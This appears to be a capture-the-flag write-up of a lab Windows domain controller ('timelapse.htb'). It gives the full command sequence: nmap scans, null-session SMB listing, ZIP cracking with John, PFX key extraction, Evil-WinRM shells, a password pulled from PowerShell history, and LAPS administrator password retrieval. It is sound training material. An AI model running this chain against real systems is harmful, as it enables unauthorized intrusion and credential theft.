2.1 Nmap Scan#

A full TCP port scan (-p-) reveals 18 open ports, all typical for a Windows Domain Controller:

1
nmap -p- --open
2

3
PORT      STATE SERVICE
4
53/tcp    open  domain
5
88/tcp    open  kerberos-sec
6
135/tcp   open  msrpc
7
139/tcp   open  netbios-ssn
8
389/tcp   open  ldap
9
445/tcp   open  microsoft-ds
10
464/tcp   open  kpasswd5
11
593/tcp   open  http-rpc-epmap
12
636/tcp   open  ldapssl
13
3268/tcp  open  globalcatLDAP
14
3269/tcp  open  globalcatLDAPssl
15
5986/tcp  open  wsmans
16
9389/tcp  open  adws
17
49667/tcp open  unknown
18
49673/tcp open  unknown
19
49674/tcp open  unknown
20
49696/tcp open  unknown
21
62656/tcp open  unknown

A version scan (-sCV) confirms strong indicators of Active Directory: Kerberos, LDAP, SMB, and the SSL‑encrypted WinRM on 5986. The SSL certificate’s Common Name is dc01.timelapse.htb, revealing the domain name.

1
Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
2
Domain: timelapse.htb0., Site: Default-First-Site-Name
3
Hostname: dc01.timelapse.htb

To make life easier, add the following line to /etc/hosts:

1
10.10.11.151 timelapse.htb dc01.timelapse.htb

2.2 SMB Enumeration (port 445)#

Using smbclient with a null session, it’s possible to list shares and browse the open share:

1
smbclient -N -L //10.10.11.151        # list shares
2
smbclient -N //10.10.11.151/open    # connect to “open”

Within the open share, two important items appear:

1
  .                                       D        0  ...
2
  ..                                      D        0  ...
3
  winrm_backup.zip                       A    25200  ...
4
  HelpDesk                               D        0  ...

The winrm_backup.zip file is the key to the first shell. The HelpDesk folder contains LAPS‑related files (.msi, .docx), a strong hint that LAPS will be used later.

3.1 Crack the ZIP Password#

Download the ZIP:

1
smbclient -N //10.10.11.151/open -c "get winrm_backup.zip"

The archive is password‑protected. Generate a hash with zip2john and crack it with John the Ripper using the rockyou.txt wordlist:

1
zip2john winrm_backup.zip > zip.hash
2
john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt

John quickly recovers the password: supersecret.

Unzip the archive:

1
unzip winrm_backup.zip
2
# password: supersecret

The extracted file is legacyy_dev_auth.pfx.

1
Archive: winrm_backup.zip
2
 extracting: legacyy_dev_auth.pfx

3.2 Extract the Certificate and Private Key#

A .pfx (PKCS#12) file contains a certificate and an encrypted private key. openssl is used to extract both:

1
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key
2
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt

The private key is encrypted, so when prompted for the import password, “supersecret” works again. After extraction, the public certificate (legacyy_dev_auth.crt) and the decrypted private key (legacyy_dev_auth.key) are available.

Image description:

1
+----------------------------------------------------+
2
|  PFX File Extraction Diagram                       |
3
|                                                    |
4
|  winrm_backup.zip  ────▶  legacyy_dev_auth.pfx     |
5
|      (supersecret)        /              \\         |
6
|                    .crt (public)    .key (private)  |
7
+----------------------------------------------------+

(Visual representation of the extraction process)

3.3 WinRM Access with Evil‑WinRM#

Evil‑WinRM can authenticate using a public/private key pair instead of a password. Connect to the SSL‑enabled WinRM on port 5986:

1
evil-winrm -i timelapse.htb -S \\
2
  -c legacyy_dev_auth.crt \\
3
  -k legacyy_dev_auth.key

A shell as legacyy is obtained. The user flag can now be read:

1
type C:\\Users\\legacyy\\desktop\\user.txt

1
35a0dfaa************************

4.1 PowerShell History File#

One of the first post‑exploitation enumeration steps is checking the PowerShell history. The file is located at:

1
C:\\Users\\legacyy\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt

1
whoami
2
ipconfig /all
3
netstat -ano |select-string LIST
4
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
5
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
6
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
7
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
8
get-aduser -filter * -properties *
9
exit

The plaintext password for svc_deploy is embedded in the history: E3R$Q62^12p7PLlC%KWaxuaV.

4.2 WinRM as svc_deploy#

Using the discovered credentials, a new Evil‑WinRM session is established:

1
evil-winrm -i timelapse.htb -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

The user svc_deploy is a member of Remote Management Use (which allows WinRM) and, crucially, the LAPS_Readers group:

1
Local Group Memberships      *Remote Management Use
2
Global Group memberships     *LAPS_Readers
3
                             *Domain Users

5.1 What is LAPS?#

Local Administrator Password Solution (LAPS) is a Microsoft technology that manages the local Administrator passwords of domain‑joined computers. The Domain Controller stores the passwords in Active Directory and rotates them periodically. A specific Active Directory group (LAPS_Readers) is granted read access to these passwords.

By default, the password is stored in the ms-Mcs-AdmPwd attribute of the computer object.

5.2 Retrieve the Administrator Password#

Because svc_deploy is in LAPS_Readers, the LAPS password can be read with a simple AD command:

1
Get-ADComputer DC01 -property 'ms-mcs-admpwd'

Output:

1
DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
2
DNSHostName       : dc01.timelapse.htb
3
Enabled           : True
4
ms-mcs-admpwd     : uM[3va(s870g6Y]9i]6tMu{j
5
Name              : DC01
6
ObjectClass       : computer

The attribute ms-mcs-admpwd contains the plaintext Administrator password.

5.3 WinRM as Administrator#

With this password, use Evil‑WinRM once more to get a privileged shell:

1
evil-winrm -i timelapse.htb -u administrator -p 'uM[3va(s870g6Y]9i]6tMu{j' -S

Read the root flag:

1
type C:\\Users\\Administrator\\Desktop\\root.txt

Image description:

1
+---------------------------------------------+
2
|  LAPS Password Retrieval Flow               |
3
|                                             |
4
|  svc_deploy (LAPS_Readers)                  |
5
|         |                                   |
6
|         v                                   |
7
|  Get-ADComputer DC01 -prop ms-mcs-admpwd    |
8
|         |                                   |
9
|         v                                   |
10
|  ms-mcs-admpwd: uM[3va(s870g6Y]9i]6tMu{j   |
11
|         |                                   |
12
|         v                                   |
13
|  Evil-WinRM as Administrator                |
14
+---------------------------------------------+

(Visual flow of privilege escalation via LAPS)